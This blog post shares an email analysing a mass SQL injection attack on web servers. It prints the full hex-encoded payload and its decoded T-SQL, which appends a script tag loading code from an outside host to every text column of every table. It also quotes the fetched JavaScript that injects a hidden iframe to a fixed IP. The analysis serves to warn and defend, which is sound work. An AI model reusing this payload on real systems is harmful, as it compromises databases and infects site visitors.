I have ben reading a few blogs recently which have been issuing notices of the fact they have been attacked with a SQL Injection into their site. A couple of sites I have been witnessing these attacks through Health Monitoring. At first I thought I best not blog about due to the fact some may take the sql and use it for the wrong purposes, but then again, it is better that a finding is published so maybe others can do more to combat it and protect their sites and services more. The following is an email which I recently sent to Rick Strahl in case the small amount of research I did may be of some use. I have now decided to publish the email on my blog, so it could be of potential help to others.
The Email
I have just read your latest blog post titled “Recent SQL Injection Attacks against Server.” I would basically like to share something which I too have found from these attacks which our servers are experiencing too. Our attack looks remarkably similar to yours, see below:
DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E6F6A6E732E72752F6A732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--
Now what I did was simply copy the cast part into a query to convert it so I can see what was being attempted. The one above and the one which I think you are experiencing also, tries and in some cases succeeds in adding a JavaScript reference to all string fields in all tables of a database. So you will see what I mean from below:
DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.ojns.ru/js.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
I downloaded the js file and inside was the following:
document.write("<iframe src=http://91.203.93.4/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
After more investigation I have found that although the domain name in the attack keeps changing the IP of the address for the iframe in the js file does not seem to change:
document.write("<iframe src=http://91.203.93.4/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
Maybe this could be used to trace the culprit who knows.
In the last week I have read and been informed of so many occurrences of a sql injection attack with the same signature as this. I was reading an article recently released by Dan Kaminsky highlighting a massive flaw in DNS, and one which enables individuals with the know how to spoof actual DNS, raises phishing to a whole new level. I read the address: http://news.bbc.co.uk/1/hi/technology/7546557.stm
The reason why I suppose I thought of connection between the two occurred to me was that the robot obviously is using anonymous proxies to route the requests but also whether www.ojns.ru in the attack sql is achieved using this newly publicised DNS bug. I keep converting these attacks and the domain name which hosts the js file of the same name keeps changing, for example another instance of the attack had this domain name: http://www.bgsr.ru/js.js . They all seem to be under a really crap alias of the union bank or something.
It would be great to find a way of really reversing this attack on the culprits.
great post, and I hope it raises the issue of code security with many more developers.
Cheers,
Andrew Rea
Scott Hanselman talks about it here aswell : http://www.hanselman.com/blog/CommentView.aspx?title=HackedAndIDidntLikeItURLScanIsStepZero
So combining with what is in the above, what Rick Strahl has done and also Scott Hanselman there are some clear signs of actions that should be taken.
Hope this is of some help,
cheers
Andrew